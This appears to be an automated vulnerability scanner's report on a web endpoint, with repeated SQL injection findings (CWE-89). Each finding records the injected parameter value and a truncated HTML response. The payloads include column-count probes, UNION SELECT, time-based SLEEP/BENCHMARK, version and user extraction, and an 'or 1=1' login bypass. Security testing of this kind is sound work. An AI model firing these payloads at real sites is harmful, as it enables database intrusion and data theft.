src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1893\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1894\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1895\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1896\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1897\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1898\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1899\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# WHERE 1=1 AND 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1900\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1901\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# pg_SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1902\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\") or (\"1\"=\"1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1903\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1904\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1905Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1906\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 